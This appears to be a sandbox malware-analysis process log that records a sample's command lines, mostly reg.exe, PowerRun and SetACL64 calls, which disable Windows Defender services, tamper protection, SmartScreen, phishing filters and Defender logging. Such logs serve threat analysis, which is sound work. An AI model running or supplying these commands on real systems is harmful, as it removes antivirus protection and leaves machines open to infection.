reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
5⤵
PID:1084

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
5⤵
PID:2996

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
5⤵
PID:2912

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
5⤵
PID:2308

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
5⤵
PID:2840

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
5⤵
PID:1616

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
5⤵
PID:3096

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
5⤵
PID:3104

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
5⤵
PID:1200

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
5⤵
PID:232

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
5⤵
PID:4564

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
5⤵
- Modifies Windows Defender notification settings
PID:4516

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
5⤵
PID:3580

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
5⤵
PID:2492

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:2020

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:1828

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:2752

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3000

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1788

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:2244

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:1280

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:3600

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:436

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:4940

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:1904

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3328

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:4372

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5008

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:5116

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5040

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4332

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1852

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:4344

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:4272

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:220

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1300

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:1524

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2216

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1744

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2208

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Modifies security service
PID:3588

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3956

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:4576

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2300

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4940

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:3428

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4256

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:3872

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3356

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:2724

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1780

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4000

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2828

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:4864

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4048

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:4496

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:772

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:1904

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:1116

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3856

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:2528

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:2564

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1800

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:2132

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:1052

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:2724

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
5⤵
- Windows security modification
PID:5020

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Windows security modification
PID:4260

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:1576

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:4848

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
5⤵
PID:4644

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:2452

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Modifies Windows Defender Real-time Protection settings
PID:2252

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:2552

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
PID:4228

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1828

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
6⤵
PID:848

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:2168

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:1892

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
PID:368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Get-MpPreference"
5⤵
PID:2964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')
5⤵
PID:4204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')
5⤵
PID:5020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\do64.bat
4⤵
PID:4584

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
5⤵
PID:3872

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
5⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
5⤵
PID:2724

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
5⤵
PID:4208

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
5⤵
PID:2620

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
5⤵
PID:1660

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
5⤵
PID:848

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
5⤵
PID:2508

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
5⤵
PID:1524

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
5⤵
PID:4008

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
5⤵
PID:1860

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
5⤵
PID:1620

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
5⤵
PID:3604

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
5⤵
- Modifies Windows Defender notification settings
PID:3580

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
5⤵
PID:392

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
5⤵
PID:3456

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
5⤵
PID:1412

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
5⤵
PID:2492

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
5⤵
PID:1576

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
5⤵
PID:3504

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
5⤵
PID:2812

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
5⤵
PID:4024

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
5⤵
PID:2964

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4496

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
5⤵
PID:4824

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
5⤵
PID:1228

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
5⤵
PID:2560

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
5⤵
PID:1936

